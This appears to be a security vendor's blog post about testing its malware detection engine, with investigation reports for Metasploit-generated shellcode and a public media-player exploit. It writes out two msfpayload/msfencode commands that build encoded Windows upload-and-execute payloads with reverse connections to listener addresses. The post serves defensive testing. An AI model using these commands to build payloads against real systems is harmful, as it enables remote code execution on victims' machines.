Malware detection testing | Quttera blog

The Metasploit is one of the best tools out there for penetration testing and generating exploits with payloads. It is an excellent framework to run field tests and quality checks for the anti-malware software capabilities in both manual and automated modes. For our core technology - malicious content detection engine, it is critical that each of the engine modules (especially the heuristic and behavior-based components) work together correctly while investigating and weighing the bits of code. Such sophisticated and self-learning engine requires regular testing on various samples to ensure both performance and regression aspects are covered. In addition to the millions of URLs scanned for malware through our publicly free Online Website Malware Scanner, the engine is continuously undergoing harness and functional tests on arbitrary generated new malware samples of various kinds. This post is just a small glance at specific (legacy) regression test cases picked from the quality assurance process we employ at Quttera labs.

Investigation report for windows/upexec/find_tag shellcode encoded by x86/shikata_ga_nai encoder

Payload generation command:

msfpayload windows/upexec/find_tag LHOST=192.168.111.129 LPORT=9988 PEXEC=./ R| msfencode -e x86/shikata_ga_nai -t raw

Offset of the detected payload:

0

Payload emulation counters:

Malware detection testing | Quttera blog

Detection disassembly:

Part 1

Malware detection testing | Quttera blog

Part 2

Malware detection testing | Quttera blog

Part 3

Malware detection testing | Quttera blog

Investigation report for windows/upexec/reverse_http encoded by x86/jmp_call_additive

Shellcode generation command:

msfpayload windows/upexec/reverse_http PEXEC=./ LHOST=127.0.0.1 LPORT=31337 R | msfencode -e x86/jmp_call_additive -t raw

Offset of the detected payload:

0

Payload emulation counters:

Malware detection testing | Quttera blog

Detection disassembly:

Part 1

Malware detection testing | Quttera blog

Part 2

Malware detection testing | Quttera blog

Investigation report for for CoolPlayer+ Portable 2.19.2 exploit

Payload source:

hxxp://1337day.com/exploits/19116

Offset of the detected payload:

0

Payload emulation counters:

Malware detection testing | Quttera blog

Detection disassembly:

Part 1

Malware detection testing | Quttera blog

Part 2

Malware detection testing | Quttera blog

Our technology provides in-depth visibility into the code and the intent of the identified suspicious components. It encompasses sophisticated classification and mathematical algorithms to detect cyber threats without a need in signatures to stay up to date with constantly evolving malware. Contact us to schedule a demo or to find out how Quttera technology can help you in protecting your website and any other digital assets. Find out more about our products and services: https://quttera.com/